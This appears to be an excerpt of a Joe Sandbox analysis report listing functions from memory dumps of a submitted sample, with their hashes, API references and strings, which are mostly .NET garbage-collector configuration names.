String ID:
API String ID: 4201588131-0
Opcode ID: 452514a172d171043efb9d9a11994c3fb97cdc7e94a50651428492a93767d4e5
Instruction ID: 932388c4a6f77b1cfcb7a6c93f0e4c2f59c3f194b18627767e6273c0a034a863
Opcode Fuzzy Hash: 452514a172d171043efb9d9a11994c3fb97cdc7e94a50651428492a93767d4e5
Instruction Fuzzy Hash: 08F0A725F1868242E640AF71F9C227E6751AF457E1F549130E9DD47797CE3CD0818740

Function 00007FF6C7574160 Relevance: 1.5, APIs: 1, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ec0d675a098dfcfbfd21db938b4ae2ba5c8a4f0f48fded99d37de52322c7096
Instruction ID: b737d47e296cde99814dcad33beab8e47ba67d10ad36723f0c8da91d7fd60438
Opcode Fuzzy Hash: 5ec0d675a098dfcfbfd21db938b4ae2ba5c8a4f0f48fded99d37de52322c7096
Instruction Fuzzy Hash: 5A61E122F0861289FB14EF65E8406FD2361AF94785F94C035DE8D97B9ADF3CE8468340

Function 00007FF6C7501770 Relevance: 1.3, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE ref: 00007FF6C750177A

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: e0e6f915b3e62b249a019bbc0d8d3fcc09be6c9d174bfcd050118d8529439d8d
Instruction ID: 33a0db0ab388a0786be893b71bdfe71b74b02cabf627e23aebb0569ae5ca9d7d
Opcode Fuzzy Hash: e0e6f915b3e62b249a019bbc0d8d3fcc09be6c9d174bfcd050118d8529439d8d
Instruction Fuzzy Hash: FBB01200F26481C2E70C2B23BC4230901153B06B43FC04024D748E1250CD1C81A51B04

Non-executed Functions

Function 00007FF6C7501A00 Relevance: 118.0, Strings: 94, Instructions: 546COMMON

Download Yara Rule

Strings

BGCFLSmoothFactor, xrefs: 00007FF6C75020AB
GCHeapHardLimitPercent, xrefs: 00007FF6C7501E8A
LOHThreshold, xrefs: 00007FF6C7501BFE
GCTotalPhysicalMemory, xrefs: 00007FF6C7501E9D
BGCSpin, xrefs: 00007FF6C7501C3A
GCDynamicAdaptationMode, xrefs: 00007FF6C750237B
System.GC.MaxHeapCount, xrefs: 00007FF6C7501C7A
System.GC.HeapHardLimitSOH, xrefs: 00007FF6C75021D7
System.GC.HeapHardLimitPOHPercent, xrefs: 00007FF6C7502281
System.GC.NoAffinitize, xrefs: 00007FF6C7501AF0
GCLowSkipRatio, xrefs: 00007FF6C7501E3B
LatencyMode, xrefs: 00007FF6C7501CD8
GCLargePages, xrefs: 00007FF6C7501BB2
System.GC.HeapHardLimitLOHPercent, xrefs: 00007FF6C7502267
BGCMLkp, xrefs: 00007FF6C75020F2
System.GC.CpuGroup, xrefs: 00007FF6C7501B78
System.GC.Server, xrefs: 00007FF6C7501A1B
BGCFLkp, xrefs: 00007FF6C7502033
BGCFLEnableSmooth, xrefs: 00007FF6C750215F
BGCFLEnableKd, xrefs: 00007FF6C7502141
BGCSpinCount, xrefs: 00007FF6C7501C1C
GCHeapHardLimitSOHPercent, xrefs: 00007FF6C750224C
LogFile, xrefs: 00007FF6C7501F2B
ServerGC, xrefs: 00007FF6C7501A2A
GCHeapAffinitizeRanges, xrefs: 00007FF6C7501D7E, 00007FF6C7501D9F
GCCpuGroup, xrefs: 00007FF6C7501B8A
GCNumaAware, xrefs: 00007FF6C7501B57
LogFileSize, xrefs: 00007FF6C7501D14
GCEnabledInstructionSets, xrefs: 00007FF6C75022A3
GCProvModeStress, xrefs: 00007FF6C7501DE1
ConfigLogEnabled, xrefs: 00007FF6C7501B36
Gen0Size, xrefs: 00007FF6C7501C9C
GCConfigLogFile, xrefs: 00007FF6C7501F5E
ConcurrentGC, xrefs: 00007FF6C7501A55
BGCFLEnableKi, xrefs: 00007FF6C7502123
GCHeapHardLimitPOHPercent, xrefs: 00007FF6C7502290
System.GC.HeapHardLimitPercent, xrefs: 00007FF6C7501E7B
System.GC.DynamicAdaptationMode, xrefs: 00007FF6C750236C
BGCFLGradualD, xrefs: 00007FF6C75020C9
GCRegionRange, xrefs: 00007FF6C7501EBB
RetainVM, xrefs: 00007FF6C7501ABC
BGCFLTuningEnabled, xrefs: 00007FF6C7501F9D
BGCG2RatioStep, xrefs: 00007FF6C75021B9
System.GC.HeapHardLimitSOHPercent, xrefs: 00007FF6C750223D
System.GC.Concurrent, xrefs: 00007FF6C7501A43
GCHeapHardLimitPOH, xrefs: 00007FF6C750222A
BGCFLff, xrefs: 00007FF6C750208D
GCGen1MaxBudget, xrefs: 00007FF6C7501E1D
LogEnabled, xrefs: 00007FF6C7501B15
BGCFLkd, xrefs: 00007FF6C750206F
System.GC.LargePages, xrefs: 00007FF6C7501BA8
NoAffinitize, xrefs: 00007FF6C7501B02
GCHeapHardLimitSOH, xrefs: 00007FF6C75021E6
System.GC.HeapHardLimitLOH, xrefs: 00007FF6C75021F9
BreakOnOOM, xrefs: 00007FF6C7501ACF
ForceCompact, xrefs: 00007FF6C7501A89
GCEnableSpecialRegions, xrefs: 00007FF6C7501EF7
LOHCompactionMode, xrefs: 00007FF6C7501BE0
GCHeapHardLimitLOH, xrefs: 00007FF6C7502208
BGCFLki, xrefs: 00007FF6C7502051
LatencyLevel, xrefs: 00007FF6C7501CF6
BGCMemGoal, xrefs: 00007FF6C7501FBB
GCConserveMem, xrefs: 00007FF6C75022D0
CompactRatio, xrefs: 00007FF6C7501D32
System.GC.ConserveMemory, xrefs: 00007FF6C75022C1
System.GC.HeapAffinitizeMask, xrefs: 00007FF6C7501D50
GCSpinCountUnit, xrefs: 00007FF6C750234E
BGCFLEnableTBH, xrefs: 00007FF6C750217D
HeapCount, xrefs: 00007FF6C7501C67
GCRegionSize, xrefs: 00007FF6C7501ED9
SegmentSize, xrefs: 00007FF6C7501CBA
HeapVerifyLevel, xrefs: 00007FF6C7501BC2
BGCMLki, xrefs: 00007FF6C7502105
MaxHeapCount, xrefs: 00007FF6C7501C89
System.GC.HeapHardLimit, xrefs: 00007FF6C7501E59
System.GC.HighMemoryPercent, xrefs: 00007FF6C7501DBF
GCHeapHardLimitLOHPercent, xrefs: 00007FF6C7502271
System.GC.Name, xrefs: 00007FF6C7502304, 00007FF6C750231C
System.GC.RetainVM, xrefs: 00007FF6C7501AAA
System.GC.HeapAffinitizeRanges, xrefs: 00007FF6C7501D72, 00007FF6C7501D93
GCHeapAffinitizeMask, xrefs: 00007FF6C7501D5F
BGCFLEnableFF, xrefs: 00007FF6C750219B, 00007FF6C75022E3
ConservativeGC, xrefs: 00007FF6C7501A68
GCHighMemPercent, xrefs: 00007FF6C7501DCE
GCGen0MaxBudget, xrefs: 00007FF6C7501DFF
GCLogFile, xrefs: 00007FF6C7501F1A
BGCFLSweepGoalLOH, xrefs: 00007FF6C7502015
ConfigLogFile, xrefs: 00007FF6C7501F6F
GCHeapHardLimit, xrefs: 00007FF6C7501E68
BGCMemGoalSlack, xrefs: 00007FF6C7501FD9
System.GC.HeapCount, xrefs: 00007FF6C7501C58
GCName, xrefs: 00007FF6C750230B, 00007FF6C750232E
System.GC.HeapHardLimitPOH, xrefs: 00007FF6C750221B
BGCFLSweepGoal, xrefs: 00007FF6C7501FF7

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCTotalPhysicalMemory$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$MaxHeapCount$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
API String ID: 0-799405152
Opcode ID: 1ebbd9bada395e0ae796c2d8dd3961aa3f840e2442c0f16195dfd22ce20a116f
Instruction ID: 65f71d3024c21096f42282d8be8e41d5265b9fb165c177b33c52aea016e72da2
Opcode Fuzzy Hash: 1ebbd9bada395e0ae796c2d8dd3961aa3f840e2442c0f16195dfd22ce20a116f
Instruction Fuzzy Hash: 79426F61A08A9782EF649F56F810AA973A4FF45BCAF416132D9CC47F25DF3CD206A704

Function 00007FF6C7502750 Relevance: 109.2, Strings: 87, Instructions: 472COMMON

Download Yara Rule

Strings

BGCFLSmoothFactor, xrefs: 00007FF6C7502EEB
GCLatencyMode, xrefs: 00007FF6C7502ACD
GCHeapHardLimitPercent, xrefs: 00007FF6C7502CA6
GCLatencyLevel, xrefs: 00007FF6C7502AF6
GCTotalPhysicalMemory, xrefs: 00007FF6C7502CCD
BGCSpin, xrefs: 00007FF6C75029F6
GCDynamicAdaptationMode, xrefs: 00007FF6C7503240
System.GC.MaxHeapCount, xrefs: 00007FF6C7502A4D
System.GC.HeapHardLimitSOH, xrefs: 00007FF6C750307C
System.GC.HeapHardLimitPOHPercent, xrefs: 00007FF6C7503162
GCHeapCount, xrefs: 00007FF6C7502A26
System.GC.NoAffinitize, xrefs: 00007FF6C7502854
GCLowSkipRatio, xrefs: 00007FF6C7502C48
GCLargePages, xrefs: 00007FF6C750292D
gcConservative, xrefs: 00007FF6C75027AF
System.GC.HeapHardLimitLOHPercent, xrefs: 00007FF6C7503134
BGCMLkp, xrefs: 00007FF6C7502F34
System.GC.CpuGroup, xrefs: 00007FF6C75028F9
System.GC.Server, xrefs: 00007FF6C750275B
GCConserveMemory, xrefs: 00007FF6C75031C0
HeapVerify, xrefs: 00007FF6C7502953
BGCFLkp, xrefs: 00007FF6C7502E3E
BGCFLEnableSmooth, xrefs: 00007FF6C7502FD8
GCLOHThreshold, xrefs: 00007FF6C75029A4
BGCFLEnableKd, xrefs: 00007FF6C7502FAF
BGCSpinCount, xrefs: 00007FF6C75029CD
GCHeapHardLimitSOHPercent, xrefs: 00007FF6C750310D
GCLogEnabled, xrefs: 00007FF6C7502881
GCBreakOnOOM, xrefs: 00007FF6C750282C
GCCpuGroup, xrefs: 00007FF6C7502900
GCNumaAware, xrefs: 00007FF6C75028D1
GCCompactRatio, xrefs: 00007FF6C7502B48
GCEnabledInstructionSets, xrefs: 00007FF6C7503190
GCProvModeStress, xrefs: 00007FF6C7502BCD
GCMaxHeapCount, xrefs: 00007FF6C7502A54
GCWriteBarrier, xrefs: 00007FF6C75031E7
GCLOHCompact, xrefs: 00007FF6C750297B
gcServer, xrefs: 00007FF6C7502762
gcForceCompact, xrefs: 00007FF6C75027D7
BGCFLEnableKi, xrefs: 00007FF6C7502F86
GCHeapHardLimitPOHPercent, xrefs: 00007FF6C7503169
System.GC.HeapHardLimitPercent, xrefs: 00007FF6C7502C9F
System.GC.DynamicAdaptationMode, xrefs: 00007FF6C7503239
BGCFLGradualD, xrefs: 00007FF6C7502F0B
GCRegionRange, xrefs: 00007FF6C7502CF6
GCLogFileSize, xrefs: 00007FF6C7502B28
BGCFLTuningEnabled, xrefs: 00007FF6C7502D71
BGCG2RatioStep, xrefs: 00007FF6C7503053
GCRetainVM, xrefs: 00007FF6C7502806
System.GC.HeapHardLimitSOHPercent, xrefs: 00007FF6C7503106
System.GC.Concurrent, xrefs: 00007FF6C7502782
GCHeapHardLimitPOH, xrefs: 00007FF6C75030E6
BGCFLff, xrefs: 00007FF6C7502EB9
GCSegmentSize, xrefs: 00007FF6C7502AA4
GCGen1MaxBudget, xrefs: 00007FF6C7502C1F
BGCFLkd, xrefs: 00007FF6C7502E90
System.GC.LargePages, xrefs: 00007FF6C7502926
GCNoAffinitize, xrefs: 00007FF6C750285B
GCHeapHardLimitSOH, xrefs: 00007FF6C7503083
System.GC.HeapHardLimitLOH, xrefs: 00007FF6C75030AA
GCEnableSpecialRegions, xrefs: 00007FF6C7502D48
gcConcurrent, xrefs: 00007FF6C7502789
GCHeapHardLimitLOH, xrefs: 00007FF6C75030B1
BGCFLki, xrefs: 00007FF6C7502E67
GCgen0size, xrefs: 00007FF6C7502A7B
BGCMemGoal, xrefs: 00007FF6C7502D9A
System.GC.ConserveMemory, xrefs: 00007FF6C75031B9
System.GC.HeapAffinitizeMask, xrefs: 00007FF6C7502B71
GCSpinCountUnit, xrefs: 00007FF6C7503210
BGCFLEnableTBH, xrefs: 00007FF6C7503001
GCRegionSize, xrefs: 00007FF6C7502D28
BGCMLki, xrefs: 00007FF6C7502F5D
GCConfigLogEnabled, xrefs: 00007FF6C75028A9
System.GC.HeapHardLimit, xrefs: 00007FF6C7502C71
System.GC.HighMemoryPercent, xrefs: 00007FF6C7502B9F
GCHeapHardLimitLOHPercent, xrefs: 00007FF6C750313B
System.GC.RetainVM, xrefs: 00007FF6C75027FF
GCHeapAffinitizeMask, xrefs: 00007FF6C7502B78
BGCFLEnableFF, xrefs: 00007FF6C750302A
GCHighMemPercent, xrefs: 00007FF6C7502BA6
GCGen0MaxBudget, xrefs: 00007FF6C7502BF6
BGCFLSweepGoalLOH, xrefs: 00007FF6C7502E15
GCHeapHardLimit, xrefs: 00007FF6C7502C78
BGCMemGoalSlack, xrefs: 00007FF6C7502DC3
System.GC.HeapCount, xrefs: 00007FF6C7502A1F
System.GC.HeapHardLimitPOH, xrefs: 00007FF6C75030DF
BGCFLSweepGoal, xrefs: 00007FF6C7502DEC

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: strcmp
String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCMaxHeapCount$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
API String ID: 1004003707-1294421646
Opcode ID: 8dd0dd815cfb6f9141113c6627f02b0dffcd85473cd5b48b1167f53c38f69273
Instruction ID: 871dd3d6f10992099df40079f24b9978893b1b05ddc7daacafcca5dba402e265
Opcode Fuzzy Hash: 8dd0dd815cfb6f9141113c6627f02b0dffcd85473cd5b48b1167f53c38f69273
Instruction Fuzzy Hash: 8862CE60D0DA87A4FE44DFABB8400B527A1AF957C6B848136C4CDDB372EE3CA559E341

Function 00007FF6C7531200 Relevance: 21.8, APIs: 14, Instructions: 792COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF6C7531580
DebugBreak.KERNEL32 ref: 00007FF6C7531598
DebugBreak.KERNEL32 ref: 00007FF6C7531647
DebugBreak.KERNEL32 ref: 00007FF6C7531685
DebugBreak.KERNEL32 ref: 00007FF6C75316D5
DebugBreak.KERNEL32 ref: 00007FF6C7531726
DebugBreak.KERNEL32 ref: 00007FF6C753178B
DebugBreak.KERNEL32 ref: 00007FF6C75317E1
DebugBreak.KERNEL32 ref: 00007FF6C7531A18
DebugBreak.KERNEL32 ref: 00007FF6C7531B09
DebugBreak.KERNEL32 ref: 00007FF6C7531B8B
DebugBreak.KERNEL32 ref: 00007FF6C7531BC4
DebugBreak.KERNEL32 ref: 00007FF6C7531BF8
DebugBreak.KERNEL32 ref: 00007FF6C7531CD7

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: f3eca593082eef418b28c3d3d3ba6008102fd1d88324591edaa9422849b7c77f
Instruction ID: f979e173c5a58d0a1855f2df67fa28bc0903b03fd84001e30b83e69f1d2c413f
Opcode Fuzzy Hash: f3eca593082eef418b28c3d3d3ba6008102fd1d88324591edaa9422849b7c77f
Instruction Fuzzy Hash: 0B729FA2A09A8682EE608F2591403B967E0FF45BD6F894535DEDD877E5DF3CE880C740

Function 00007FF6C7501830 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6C750186C
GetCurrentProcess.KERNEL32 ref: 00007FF6C7501894
OpenProcessToken.ADVAPI32 ref: 00007FF6C75018A7
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6C75018CC
GetLastError.KERNEL32 ref: 00007FF6C75018D4
CloseHandle.KERNEL32 ref: 00007FF6C75018E1
GetLargePageMinimum.KERNEL32 ref: 00007FF6C75018F6
VirtualAlloc.KERNEL32 ref: 00007FF6C7501927
GetCurrentProcess.KERNEL32 ref: 00007FF6C7501933
VirtualAllocExNuma.KERNEL32 ref: 00007FF6C7501953

Strings

SeLockMemoryPrivilege, xrefs: 00007FF6C7501865

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
String ID: SeLockMemoryPrivilege
API String ID: 1752251271-475654710
Opcode ID: a64ce78d6ed104d2b6db937a96794cdf395e2d8bd2e23d037bc090c5da09f6ca
Instruction ID: 35420b5ca29b58435221a814683f367b88241ac8ce56b12e6a95b4d5ea3ea403
Opcode Fuzzy Hash: a64ce78d6ed104d2b6db937a96794cdf395e2d8bd2e23d037bc090c5da09f6ca
Instruction Fuzzy Hash: 2B319225A0C6C286FB609F62F40437A67A1FB84BDAF404035EACE87754DE3CD5489700

Function 00007FF6C752A7B0 Relevance: 10.9, APIs: 7, Instructions: 376COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32(?,?,?,?,?,?,?,00007FF6C75292AB), ref: 00007FF6C752A909
EnterCriticalSection.KERNEL32 ref: 00007FF6C752AC36
LeaveCriticalSection.KERNEL32 ref: 00007FF6C752AC50
DebugBreak.KERNEL32 ref: 00007FF6C752ACFD
DebugBreak.KERNEL32 ref: 00007FF6C752AD1A
DebugBreak.KERNEL32(?,?,?,?,?,?,?,00007FF6C75292AB), ref: 00007FF6C752AD35
DebugBreak.KERNEL32(?,?,?,?,?,?,?,00007FF6C75292AB), ref: 00007FF6C752AD4E

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: BreakDebug$CriticalSection$EnterLeave
String ID:
API String ID: 3888577265-0
Opcode ID: 85ea48a1a99b938aa19da754aa1e3e25a96ca83b17da667f6cf815f9fa7db2f7
Instruction ID: 08c7cb7bdd6182423aadb49706c21b79915b007f64dfc7b330d753c9f7505dbf
Opcode Fuzzy Hash: 85ea48a1a99b938aa19da754aa1e3e25a96ca83b17da667f6cf815f9fa7db2f7
Instruction Fuzzy Hash: 6702AB76A09B8286EF558F26954427837A5FF44B86F8A4136CECE837A1DF3CE491C300

Function 00007FF6C74F6A50 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

APIs

RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF6C74F73A0), ref: 00007FF6C74F6B07
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF6C74F73A0), ref: 00007FF6C74F6C51
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF6C74F73A0), ref: 00007FF6C74F6D33
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF6C74F73A0), ref: 00007FF6C74F6D49
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF6C74F73A0), ref: 00007FF6C74F6DBE

Strings

[ KeepUnwinding ], xrefs: 00007FF6C74F6D5D

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: ExceptionFailFastRaise
String ID: [ KeepUnwinding ]
API String ID: 2546344036-400895726
Opcode ID: 37b542edfd6e6a04d6d6af4a5e84d7cb03416debfb2b6644f32ce5e3f49ff12d
